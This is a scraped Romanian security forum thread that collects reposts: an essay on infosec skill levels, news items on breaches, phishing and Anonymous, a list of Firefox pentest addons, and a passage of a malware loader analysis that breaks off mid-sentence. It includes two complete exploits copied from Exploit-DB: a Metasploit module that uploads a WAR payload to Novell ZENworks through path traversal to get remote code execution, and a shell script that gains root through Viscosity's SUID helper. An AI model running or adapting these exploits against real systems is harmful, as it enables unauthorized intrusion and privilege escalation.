DarkyAngel

înregistr?rile au fost închise momentan. dac? vre?i cont, ?i nu ave?i deja, scrie?i aici, sau dac? dori?i s? "invita?i" un prieten, preciza?i asta pe chat-ul PoS unui admin.

During my years of work as a consultant and trainer in the information security world, I’ve noticed a few patterns that usually exist in those who do very well in the industry vs those who just make it by. I decided to draft this article to share some of the key elements and more importantly, give somewhat of a metric to gauge where you the reader currently sit. Basically there seems to be 4 key levels that I consider to be different milestones or “levels of understanding” as related to this field. I originally heard a concept like this many years ago as it relates to music. Now I’m going to relate this more directly to penetration testing and exploit writing, but you can apply it to any area of specialization in information security. Let’s start with Level 1. Level 1 – Interested Newbie – Unknowing and Unconscious You don’t know really how to learn these arts, plus you’re unconscious of the fact that you don’t know. This level is where you’ve probably got your Security+ or you’ve gained the equivalent knowledge base by reading and “tinkering”. You haven’t learned how to exploit anything yet. You know what port scanning is, but you’ve never really done it. You’re familiar with the terms Trojan, malware, rootkit, exploitation, etc. But you haven’t actually had hands on with any of this, at least not knowingly **smile**. Eventually you start playing with some tools. If you’re a person who’s said, “I downloaded Backtrack but I haven’t figured out how to do anything with it yet,” then you most likely fall into this category. Linux is still a big dark scary cloud for you (if you come from a Windows background), and vice versa if you’re a Linux background person. You might have even taken a CEH class, and you feel like you saw a lot of cool stuff, but you can’t really sit down and reproduce much of it. Level 2 – Practicing Youngster (a year or two in) Knowing and Unconscious You now know a little bit about how to learn these techniques but you’re still unconscious of what you don’t know. You’re still new to the field. You might have a job that requires you to work with firewalls a little or maybe support of some type. Your inner hacker curiosity has you spending lots of time tinkering with security tools and techniques even though it might not be part of your job. You can run some security tools. You are not “too” afraid of Linux anymore. You’ve been able to get Backtrack to communicate with your network. You’ve learned how to set IP addresses in Linux, and you’re comfortable doing basic things from the shell. You have learned how to use Nmap somewhat. Additionally you’ve also found one or two forums which you like to visit and learn new things from. The information in these forums end up being pretty basic, but at the level you’re at right now, you’ve found the more advanced forums like the official Metasploit one to be too technical for you. You maybe visit your first Blackhat/Defcon conference. You leave there realizing for the first time how much you really don’t know. You reach a point of information overload. You enjoy the conference and see lots of eye-popping demonstrations, but you don’t really understand how it works or what the implications really are. You leave Blackhat with the gut punching realization that you lack the technical ability to demonstrate or recreate anything you’ve witnessed. And this is where you actually start to learn. Level 3 – Serious Practitioner – Knowing and Conscious At this point you know how to learn the skills, and you’re conscious of the fact that there are limitless amounts of stuff you don’t know, and additionally you have an idea about the many different aspects and fields within information security. You truly grasp that reverse engineering, exploit writing, and penetration testing are not one big blob of variations of the same thing. You realize that they can all complement each other but they’re not the same. You have gained enough skills to be great one day, but you might not ever truly have the time, or invest the time required, to get to the next level. It’s been a couple of years or so since you went to Blackhat/Defcon the first time. Now you go back and you understand exponentially more than you did the first time. You’re able to come back and duplicate most of what you’ve seen in the presentations. You also understand what you’ve seen well enough to demo and present it to others. If you’ve never learned to code you have at this point realized that it’s going to hinder you at some point in your career. You’ve started to learn some scripting languages and you’re pretty good with them (Perl, Python, etc). You’re aggressively trying to learn C not C+, C++, C# or any of those, but just C. Why? Because a respected security professional told you that you really needed to learn it. You’re also trying to learn Assembly because you’ve been told that you really needed to know it to write exploits. You view exploit writing and reversing as the next thing you want to accomplish from a learning perspective. But you’ve realized you need to know programming concepts and constructs well to truly reverse and write exploits. You are able to follow exploit writing examples without problem, but your understanding of memory, calls, packing, etc. keeps you from doing it “for real”. If someone gave you a Backtrack CD and a couple of Windows computers and asked you to demonstrate a client side exploit, a server side exploit, and how scanning works, you could do it with no problem. You know TCP and IP like you know your name. You can look at a packet capture and instantly pick out three-way handshakes and other session establishments. You still don’t really know web applications that well, because you still don’t know programming and applications that well. You can demonstrate fluently all of the OWASP top 10, but you still feel there’s a lot missing. Congratulations, you’ve reached the point where most security professionals stop or plateau. Level 4 – Expert – Knowing and Unconscious You are above most in both skill and knowledge. You know that there are things you don’t know, but you learn them frequently. It’s almost as if it’s a drug to you. You sit with your laptop daily/nightly and plug into forums, YouTube videos, presentations, coding etc. Every night for you seems as if you’ve plugged your brain into the Matrix and had information dumped into it. While you know there are things you want to learn, you don’t even know or bother to figure out “how” you’re learning them. Your skills are mature enough to where you just “do”. You learn without knowing how. When you do present or demonstrate stuff to others, you’re often told that you go way too fast and really, you assume that your audience understands more than they actually do. There is no looking back now. The only thing that drives you really is learning more. You’re also very much into finding new exploits, and finding new ways to use old exploits. While information security may or may not be your job, it is now your passion. Level 5 – Leader – Unknowing and Unconscious You are now at the very top of the field. Whether the rest of the world knows it or not is not relevant. You are not conscious of what you don’t know because you simply don’t care. You have obtained a body of knowledge that puts you in a position to where if you want to learn something, you simply learn it. Nothing about exploitation, or information security seems out of your reach. The only reason you don’t learn something is because you don’t want to. You are now a creator, a driver, and an industry shifter. You are one of the people who puts out what others must learn. The industry doesn’t control what you need to know, you control what the industry needs to know. A few names come to mind for me: HD Moore, Dan Kaminsky and others. For example, Metasploit, the brainchild of HD Moore, literally changed exploitation and exploit development forever. Dan Kaminsky’s DNS research a few years ago caused visible shifts in attention paid to infrastructure security as related to things like DNS. Most people will never make it to this level. Not because people aren’t smart enough. It’s because maybe you won’t be able to put the time in. Or maybe you won’t have access to resources needed (some countries filter all Internet traffic). To say HD Moore accomplished what he has simply because he is smart would completely ignore all the obvious huge amounts of time and hard work he’s put in over the years. I think one has to have certain proclivities to reach this level, but I also think the time investment is more important than anything else. Below I created a graphic to illustrate this better. Original Article

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20502[/td] [td]CVE: 2011-2653[/td] [td]OSVDB-ID: 77583[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-08-15[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Asset Management Remote Execution', 'Description' => %q{ This module exploits a path traversal flaw in Novell ZENworks Asset Management 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file outside of the MalibuUploadDirectory and then make a secondary request that allows for arbitrary code execution. }, 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2011-2653' ], [ 'OSVDB', '77583' ], [ 'BID', '50966' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ], [ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ] ], 'Privileged' => true, 'Platform' => [ 'java' ], 'Targets' => [ [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2011')) register_options( [ Opt::RPORT(8080), OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3]) ], self.class ) end def exploit # Generate the WAR containing the payload app_base = rand_text_alphanumeric(4+rand(32-4)) jsp_name = rand_text_alphanumeric(8+rand(8)) war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s uid = rand_text_alphanumeric(34).to_s data = "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"RequestParms\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"rtyp\"\r\n\r\n" data << "prod\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"sess\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"mode\"\r\n\r\n" data << "newreport\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"dp\"\r\n\r\n" data << "n\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"oldentry\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"act\"\r\n\r\n" data << "malibu.StartImportPAC\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"saveact\"\r\n\r\n" data << "malibu.StartImportPAC\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"isalert\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"queryid\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"Locale\"\r\n\r\n" data << "MM/dd/yyyy\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"CurrencySym\"\r\n\r\n" data << "$\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"CurrencyPos\"\r\n\r\n" data << "start\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"ThousandsSep\"\r\n\r\n" data << ",\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"CurDecimalPt\"\r\n\r\n" data << ".\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"MinusSign\"\r\n\r\n" data << "-\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"sum\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"grp\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"col\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"PreLoadRight\"\r\n\r\n" data << "yes\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n" data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"uploadFile\"; filename=\"/#{"../" * datastore['DEPTH']}#{app_base}.war\x00.txt\"\r\n" data << "Content-Type: application/octet-stream\r\n\r\n" data << war_data data << "\r\n" data << "------#{uid}\r\n" data << "Content-Disposition: form-data; name=\"SuccessPage\"\r\n\r\n" data << "Html/UploadSuccess.html\r\n" data << "------#{uid}--\r\n" res = send_request_cgi( { 'uri' => "/rtrlet/catch", 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=----#{uid}", 'data' => data, }) print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...") select(nil, nil, nil, 10) if (res.code == 500) print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...") send_request_raw( { 'uri' => "/#{app_base}/" + "#{jsp_name}" + '.jsp', 'method' => 'GET', }) else print_error("WAR upload failed...") end end end Sursa

^ ))) voi vedeti de când e postul, apropo ? plus ca mai e postat înc? de vreo 3 ori

La mul?i ani tex, ?i la mul?i ani tuturor cu numele de Maria/Marian !

^ lumea face mai nou ?i prezentare doar pentru +1 post

Numele care au provocat unul dintre cele mai mari scandaluri din ultimul an ar putea sa reapara pe harta internetului. Este vorba despre Megaupload, un site inchis, dar pe care Kim Dotcom ar planui sa-l relanseze, conform Next Web si Gizmodo. "Stiu ca voi toti asteptati asta. Va veni. Anul acesta. Promit. Mai mare, mai bun, mai rapid, 100% sigur si de neoprit", a postat acesta pe pagina sa de Twitter. Next Web a interpretat initial mesajul ca ar fi fost vorba despre proiectul Megabox, un site de muzica pe care Kim Dotcom il avea in planuri. "Da, si Megabox apare in acest an", a fost raspunsul lui Kim Dotcom. "Acesta lasa o singura usa libera acum. Este vorba despre Megaupload.", a scris Gizmodo. Sursa

cine înva?? javascript aici, ?i ar trebui s? rezolve problemele pe baza a ce a înv??at, noi sau tu? btw: tu ai f?cut: var TotalCosts = function(salary, numWorkers, city) {

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 begin 755 test.sh - -96-H;R`G:&5L;&\G"@`` ` end -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJQKW7HAAoJECCScoklHSf8/aQIAJLnszDUBSN0h7MS18XOOxM9 f1EIMmxYMCc/ZkrpynC0dSduEszlzfL2T/M1q7Eqj4LhDbHRNp0Bt7IEGsHsqcc9 zvZDZ/H90oaZtH+Rgp9FRAtMO7fDnZgZK8CEPj8bJzJbZrQO+LRtY00oYigFpGn4 7gmSn2Y/BBSbmk3J85Lbcsc65WysQeaR4D+H7fSr8t6cNMaJ2223jMN+IK1QTlwq 4fm1CKLsSoNWoyvWM8HLeAhrxdO4w1h1zKis3b83f0bFOGihDiXCfAkwAGASbVY/ 9U1+H0Bd2522Zf7mdWfbXQAsrDkKdUOlgnwfnda4oWRYIDBusxP8aA40/wsLS04= =KHqS -----END PGP SIGNATURE----- http://sprunge.us/NONd

^ wtf? tu vrei ban ?i nu ?tii cum s? ceri?

[table=width: 500, class: grid] [tr] [td]EDB-ID: 20485[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: zx2c4[/td] [td]Published: 2012-08-13[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] #!/bin/sh # ########################## # Viscatory # # # # zx2c4 # ########################## # # After the hullabaloo from the Tunnelblick local root, savy Mac users # began defending Viscosity, another OS X VPN client. They figured, since # they spent money on Viscosity, surely it would be better designed than # the free open-source alternative. # # Unfortunately, this exploit took all of 2 minutes to find. DTrace for # the win. Here, the SUID helper will execute site.py in its enclosing # folder. A simple symlink, and we have root. # # greets to jono # # Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh echo "[+] Crafting payload." mkdir -p -v /tmp/pwn cat > /tmp/pwn/site.py <<_EOF import os print "[+] Cleaning up." os.system("rm -rvf /tmp/pwn") print "[+] Getting root." os.setuid(0) os.setgid(0) os.execl("/bin/bash", "bash") _EOF echo "[+] Making symlink." ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root echo "[+] Running vulnerable SUID helper." exec /tmp/pwn/root Sursa

At the Black Hat conference last month, PhishMe, a company that teaches security awareness to help users identify Phishing and targeted attacks, spoke to 250 security professionals and asked them for basic information on how their organizations deals with, or is impacted by, Phishing attacks. As it turns out, it’s a common issue, and most of the basics steps are doing little to lessen the blow. Nearly 70% of those who spoke to PhishMe said that they encounter Phishing messages that slip past anti-Spam filters at least a few times a week. Further, 25% of them said that they see them several times a day. Spear Phishing has become a popular method of infecting enterprises with malware, according to PhishMe. The survey’s results said that more than one quarter (27%) of those who took part said that top executives or other privileged users had been compromised by Spear Phishing in the last 12 months. Another 31% said they weren't sure if executives or privileged users had been attacked. "Many enterprises believe that because they are using spam filtering tools or other email security technologies, they are safe from phishing attacks," said Scott Greaux, Vice President of Product Management & Services at PhishMe. "What we found in our survey is that despite such filters, end users are presented with live, malicious attacks in their inboxes nearly every day." Additional details from the survey include the fact that awareness training is given yearly (or at least once a year) to 49% of the employees at the respondent’s organization, while 10% said that no awareness training is given. "This survey demonstrates with great clarity that phishing attacks – particularly targeted attacks – are getting through to end users with alarming regularity, yet most organizations don't train their users on what the most current attacks look like or how to react to them," added Aaron Higbee, CTO and co-founder of PhishMe. Sursa

A thief reportedly reaches up to steal a closed-circuit TV camera, not stopping to think that the camera might be taking pictures of him. I am loath to describe anyone as stupid. Principally because I am acutely aware of my own stupidities. They are several and reveal themselves most days -- last night, for example. However, I feel sure that several people will consider using this hard, unforgiving word to describe the reported behavior of Steven Wardle. Wardle is a 35-year-old man who lives in the Midlands of England. As the Daily Mail tells it, he is something of a thief. His penchant was stealing close-circuit TV cameras -- perhaps, who knows, to re-sell them. Still, it isn't necessarily easy or wise to steal CCTV cameras. (To illustrate this, I have embedded footage from previous English miscreants who tried to saw off a pole with a CCTV camera on it.) You often have to climb up walls, drainpipes, or poles. Worse, the cameras might be on and therefore be sending pictures of your straining face back to recording machines. This, sadly, is what happened in the case of Steven Wardle. He was found guilty of stealing nine cameras from doctors' offices, housing association buildings, and council offices. For this crime -- as well as handling stolen license plates and leaving a gas station without paying -- he was given a suspended 24-week jail sentence. I don't think that means suspended from a wall beneath a CCTV camera. Sursa

The company behind games such as World of Warcraft and Diablo tells customers it believes no financial information was accessed but suggests users change their passwords immediately. Game maker Blizzard Entertainment's internal network security has been breached, the company informed customers today. While the company behind World of Warcraft and Diablo believes no sensitive financial information was compromised, it said e-mail addresses for non-China Battle.net players and scrambled passwords were stolen, Blizzard President Michael Morhaime said in a company blog post: In addition to the e-mail lists, the company said the personal security question and mobile and dial-in authentication information for users in the United States, Australia, New Zealand, and Latin America were also illegally accessed. The company said it believes its cryptography techniques will make it very difficult to crack the passwords and hack into accounts. "Based on what we currently know, this information alone is NOT enough for anyone to gain access to Battle.net accounts," Morhaime said in the blog. However, the company is nevertheless recommending that users change their passwords immediately: The disclosure comes at a time of heightened awareness over password security. Last month, Yahoo confirmed that some 453,000 login credentials stored in plain text were stolen from the Web pioneer's network. Other recent high-profile password thefts at LinkedIn, eHarmony, and Last.fm contributed to approximately 8 million passwords posted in two separate lists to hacker sites in early June. Sursa

The Ukraine-hosted BitTorrent site came under scrutiny by the local authorities and was ultimately terminated last week, now the international hacking group vows a settling of scores. Anonymous has promised to bring down its wrath on the Ukrainian government after authorities were said to have taken down the file-sharing site Demonoid last week. "Last week, our generous green friend, the Demonoid, was met with a state sponsored Distributed Denial of Service attack...These illegal actions were then followed up with a raid by Ukraine authorities," the hacking group wrote in a blog post on AnonPR yesterday. "In retaliation for your criminal acts against us and the free flow of information, we have already begun an operation against those responsible. Lazers are already being fired." Ukraine-hosted Demonoid was taken down last week after local authorities contacted its Internet Service Provider Colocall. According to the BBC, officials then went to Colocall's office and copied data off of its servers. However, Colocall said that it decided to cease Demonoid's service on its own accord. According to the BBC, it said the reason for the termination was due to a "combination of factors" and there were "too many issues for a single customer." Demonoid was among the Web sites included in the U.S. "Notorious Markets List," which was created to identify "markets, including those on the Internet, which exemplify the problem of marketplaces dealing in infringing goods and helping sustain global piracy." The BitTorrent site was ranked in the top 600 Web sites in global traffic and the top 300 in U.S. traffic. Anonymous said it will use "any means necessary" to restore Demonoid. "Where one has fallen, many will rise to take their place," it wrote in the blog post. Here are its "#OpDemonoid" objectives: Restore Demonoid services by any means necessary and, if possible, facilitate a series of mirror sites operated by free Anons everywhere. In essence, open source Demonoid. Retaliate against those responsible for the interruption. And Lulz. According to the BBC, several distributed denial of service, or DDoS, happened over the last week, but none of them has been lasting. Apparently certain Web pages on the Ukrainian Anti-Piracy Association, the Ukrainian Agency for Copyright and Related Rights, and the National Television and Radio Broadcasting Council of Ukraine were unavailable for periods of time but then were restored. Sursa

The trade commission says that Facebook must now submit to biennial privacy audits and obtain users' express consent before sharing information. The Federal Trade Commission (FTC) has inked a final settlement with Facebook over the company's privacy practices. Under terms of the settlement, Facebook has agreed to provide users with "clear and prominent notice" anytime their information is shared. But before that can happen, Facebook must obtain its users' "express consent" before sharing any information that exists outside the auspices of its privacy settings. In addition, the agency will force Facebook to maintain a "comprehensive privacy program," and subject its service to biennial privacy audits. The FTC first announced the settlement with Facebook back in November. Following that, the government organization gave the public time to comment. Today's announcement marks an official end to the investigation, and will now force Facebook to comply. If it doesn't, the company could be subject to civil penalties of up to $16,000 for each violation of the order. The agency kicked off its investigation into Facebook's privacy practices back in 2009 after several watchdogs filed a complaint charging the social network with exposing information users had previously set to private. Facebook also claimed that third-party apps access to user information would be limited to what was necessary to operate. However, the apps were able to access nearly all of the users' personal data, the FTC reported in its findings. The FTC yesterday settled its another privacy complaint it launched against Google over the search company's alleged user tracking in Apple's Safari browser. Unlike the Facebook settlement, Google was hit with a $22.5 million fine -- the largest ever for violation of the agency's order. As with the Google deal, the FTC says that its settlement with Facebook is in the public's interest. However, the agency made it clear that if Facebook doesn't adhere to its order, it will take action. "We intend to monitor closely Facebook's compliance with the order, and will not hesitate to seek civil penalties for any violations," the agency's commissioners wrote today in a joint statement. "We are pleased that the settlement, which was announced last November, has received final approval," Facebook told CNET in an e-mailed statement. This story has been updated throughout the morning. Sursa

The majority of the penetration testers are using the Mozilla Firefox as a web browser for their pentest activities.This article will introduce the firefox addons that can be used for a web application penetration test. 1) Firebug It is useful for the debugging tools that can help you tracking rogue javascript code on servers. 2) User Agent Switcher You can use this extension to change the user agent of your browser.Useful for web application penetration tests that you want to check and the mobile versions of the websites. 3) Hackbar Useful for SQL injection and XSS attacks.It includes also tools for URL and HEX encoding/decoding and many more. 4) HttpFox Monitor and analyze all the incoming and outgoing HTTP traffic between your browser and the web server. 5) Live HTTP Headers View the HTTP headers of a website instantly. 6) Tamper Data View and modify HTTP/HTTPS headers and post parameters. 7) ShowIP Shows the IP of the current page in the status bar.It also includes information like the hostname,the ISP,the country and the city. 8) OSVDB Open Source Vulnerability Database Search. 9) Packet Storm search plugin Search the packet storm database for exploits,tools and advisories. 10) Offsec Exploit-db Search Search the Exploit-db archive. 11) Security Focus Vulnerabilities Search Plugin Search for vulnerabilities in the Security Focus 12) Cookie Watcher Watch the selected cookie in the status bar. 13) Header Spy Shows HTTP Headers on status bar 14) Groundspeed Manipulate the application user interface. 15) CipherFox Displays the current SSL/TLS cipher and certificate on the status bar. 16) XSS Me Tool for testing reflected XSS vulnerabilities. 17) SQL Inject Me Extension to test SQL Injection vulnerabilities. 18) Wappalyzer Discover technologies and applications that are used on websites. 19) Poster Make HTTP requests,interact with web services and watch the output. 20) Javascript Deobfuscator Show the JavaScript code that are running on web pages. 21) Modify Headers Modify HTTP request headers. 22) FoxyProxy Advanced proxy management tool. 23) FlagFox Displays a country flag for the location of the web server.It also includes tools such as Whois,Geotool,Ping,Alexa etc. 24) Greasemonkey Customize the way a webpage behaves by using small bits of JavaScript. 25) Domain Details Displays Server Type, Headers, IP Address, Location Flag, and links to Whois Reports. 26) Websecurify Useful for security assessments in web applications. 27) XSSed Search Search the cross-site scripting database at XSSed.Com 28) ViewStatePeeker ASP.NET viewstate viewer. 29) CryptoFox CryptoFox is an encryption/decryption tool for cracking MD5 passwords. 30) WorldIP Location of the web server,IP,Datacenter,Ping,Traceroute,RDNS,AS etc. 31) Server Spy Unveils the technology of the web server (Apache, IIS etc.) 32) Default Passwords Search CIRT.net default password database. 33) Snort IDS Rule Search Search for Snort IDS Rules. Sursa

In the last installment, we examined the PEB Loader Data Structure. We take up the discussion here. Locate and Isolate the Embedded Decrypted Executable Once the VAs of the necessary APIs are stored, we are back to the next instruction after the CALL at address 004085CD that we mentioned earlier. The piece of code that follows is also of great interest: 004085D2 64A1 30000000 MOV EAX, DWORD PTR FS:[30] ß get address of PEB 004085D8 8B40 08 MOV EAX, DWORD PTR DS:[EAX+8] ß get self image base from PEB (main module) 004085DB 8983 38153A00 MOV DWORD PTR DS:[EBX+3A1538], EAX ß store self image base 004085E1 8BBB 38153A00 MOV EDI, DWORD PTR DS:[EBX+3A1538] ß move self image base to EDI 004085E7 03BB 60153A00 ADD EDI, DWORD PTR DS:[EBX+3A1560] ß add EDI a constant (AE000) The following five instructions are another example of obfuscation. The final result is always 10000, so it could just do MOV ESI, 10000. However, this could be a dynamic calculation of the size of the area needed to allocate based on the characteristics of the file wrapped with this loader. 004085ED BE 61010000 MOV ESI, 161 004085F2 03B3 5C153A00 ADD ESI, DWORD PTR DS:[EBX+3A155C] 004085F8 03B3 6C153A00 ADD ESI, DWORD PTR DS:[EBX+3A156C] 004085FE 81C6 00000100 ADD ESI, 10000 00408604 81E6 0000FFFF AND ESI, FFFF0000 Then uses VirtualAlloc API to allocate some extra memory with PAGE_EXECUTE_READWRITE access rights. 0040860A 6A 40 PUSH 40 0040860C 68 00300000 PUSH 3000 00408611 56 PUSH ESI 00408612 6A 00 PUSH 0 00408614 FF93 25153A00 CALL NEAR DWORD PTR DS:[EBX+3A1525] ß points to Imports Table above, at the address of the VirtualAlloc API. Once the new memory area is allocated, it will start writing some code there. The first code transfer takes place a few instructions later. 00408631 F3A4 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ß ESI points to 00408993, EDI is whatever address was returned by the VirtualAlloc API, and ECX which is the counter is 161. The next code transfer to the allocated memory area: 0040865C F3A4 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ß ESI points to 00402488, EDI is whatever address was returned by the VirtualAlloc API + 4349, and ECX this time is BE. Next code transfer: 0040866A F3A4 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ß ESI points to 00403140, EDI is whatever address was returned by the VirtualAlloc API + 4407, and ECX this time is 17B7. Next code transfer: 00408678 F3A4 REP MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ß ESI points to 00406028, EDI is whatever address was returned by the VirtualAlloc API + 5BBE, and ECX this time is 255C. The next interesting part of loader’s code is at address 0040868C where it calls a function that decrypts a portion of the code transferred to the previously allocated memory area. 0040896E 89CE MOV ESI, ECX 00408970 83E6 03 AND ESI, 3 00408973 75 12 JNZ SHORT 00408987 00408975 8B5D 10 MOV EBX, DWORD PTR SS:[EBP+10] 00408978 6601DA ADD DX, BX 0040897B 6BD2 03 IMUL EDX, EDX, 3 0040897E 66F7D2 NOT DX 00408981 C1CA 07 ROR EDX, 7 00408984 8955 10 MOV DWORD PTR SS:[EBP+10], EDX 00408987 3010 XOR BYTE PTR DS:[EAX], DL ß after performing a few calculations, it XORes the byte in the memory location pointed by EAX with the value stored in DL. Starting address is 002D4349. 00408989 40 INC EAX 0040898A C1CA 08 ROR EDX, 8 0040898D E2 DF LOOPD SHORT 0040896E ß loop up 3DD1 times Once we exit this function, we meet another code transfer. 004087CA A4 MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ESI] ß ESI points to the memory area on which the previous function was performing the decryption and EDI. EDI is whatever address was returned by the VirtualAlloc API + 161. In this case, ECX is the counter (which here is equal to 3DD1). Before continuing, let’s take a look at how the decrypted code that is going to be transferred looks like. I am only showing a small code block from the beginning of it. 002D4349 M8Z€8gÿ@Ñxá.ã€.º|.´.Í!¸`L.This prog3amÃc£n§tóbe× 002D4389 çu¯ÌiD?OS.mode…V$DPELÅrOXàà9 sSC…*ÊØ&™’ð<0Vž@‚;¯ 002D43C9 ‚”ÁR h>@m!.*h?Äx¼1Î0.tXŸ4FkðUPXW0íC’‰`™àQ1?‘Èð”8(¨@ˆ.rrsRc 002D4409 ÝÌV+àÀ3.0P4}!…²7{ïIØÎÙBbh6!è€.È×þÿU‰åìÇ…ðûßÀ Well, it looks like that the decrypted code is an executable module, but obviously it is not yet well re-constructed in memory. The code that follows, aims to reconstruct the decrypted executable in memory, and the following code block show the beginning of the executable after this has been done. 002D0161 MZ€……ÿÿ..@……@……………………………..€… 002D01A1 º.´.Í!¸LÍ!This program cannot be run in DOS mode…$…….. 002D01E1 PE..L.ÅrO……..à. C.@……à..€&..ð…0…@……. 002D0221 ……………@………………………………… 002D0261 ¼1…..0.¼………………………………………….. 002D02A1 ………………………………………………..UPX0…. 002D02E1 .à……………………€..àUPX1…..@…ð…8…………. 002D0321 ….@..à.rsrc…….0…..:…………..@..À3.04.UPX!..²7{ ´BÛš§‹öò.ïwgˆ@ªpàÈà–àörÝw. It is quite obvious that the loader just decrypted a UPX packed executable module. When this happens, the most common scenarios are: to dump this memory area to a new file and launch a child process, or transfer the execution directly to the entry point of the decrypted executable in memory. In any case, we are going to need this executable in order to analyse the next stage, so I am going to isolate it from memory in two simple steps. First, I am going to dump the whole allocated memory area because I know the executable is there, and then I will cut-off all the pre-pended code that I don’t need anymore, and save the file. The following figure demonstrates the second step: At this point we can directly start working on the UPX packed executable we just saved, since the loader is going to jump to its entry point in memory anyway after writing its code from the allocated memory inside its own PE image address space. 002D006A FFE1 JMP NEAR ECX ß jump to entry point of the UPX packed file. Going Through the Third Stage of the Loader We can now start working on the UPX packed file we extracted from the loader’s memory during the previous part of the analysis. Manually unpacking a UPX packed file is quite trivial so I am not going to dedicate any more lines talking about UPX. Instead I will continue with the analysis of the code of the malware’s loader. 0040E5D4 55 PUSH EBP ß OEP 0040E5D5 89E5 MOV EBP, ESP 0040E5D7 81EC 34020000 SUB ESP, 234 0040E5DD C745 CC 0000000 MOV DWORD PTR SS:[EBP-34], 0 0040E5E4 C745 D0 0000000 MOV DWORD PTR SS:[EBP-30], 0 0040E5EB C745 D4 0000000 MOV DWORD PTR SS:[EBP-2C], 0 A few instructions later, we observe an attempt to detect whether the malware is currently running inside a sandbox. I can’t tell which sandbox the following trick was tested against by the author, but here is how it is implemented. It actually pushes on the stack the absolute path of the directory in which it’s located and then pushes on the stack the string “sand-box”. Finally, it uses the strstr function to check if the absolute path contains this substring. SandBox check: 0040E666 51 PUSH ECX 0040E667 50 PUSH EAX 0040E668 FF15 AAF84000 CALL ntdll.strstr Stack View: 0006FD4C 0006FD54 s1=”c:\users\r.c.e\desktop\matsui\upx_packed_decrypted.pe” 0006FD50 0006FF70 s2 = “sand-box” If the check described above succeeds, the process will terminate. During this stage, the loader will first copy the imports table from one location to another, and then it will attempt to create a child process and inject a thread to it. If you take a look, a few instructions later you will notice a few calls to the memcpy function through which copies the imports table are created. Once the imports table is copied, there is a CALL to a function at address 0040E6F8. This function is dedicated to the creation of the child process and also calls another function dedicated to the injection of the malicious thread. In the next part, I am going to demonstrate two ways to keep control of the execution of the injected code on the new thread, which is set to run immediately after creation. Keep Control on Injected Threads By entering the function from the CALL mentioned above, we can see the piece of code that launches the child process is in 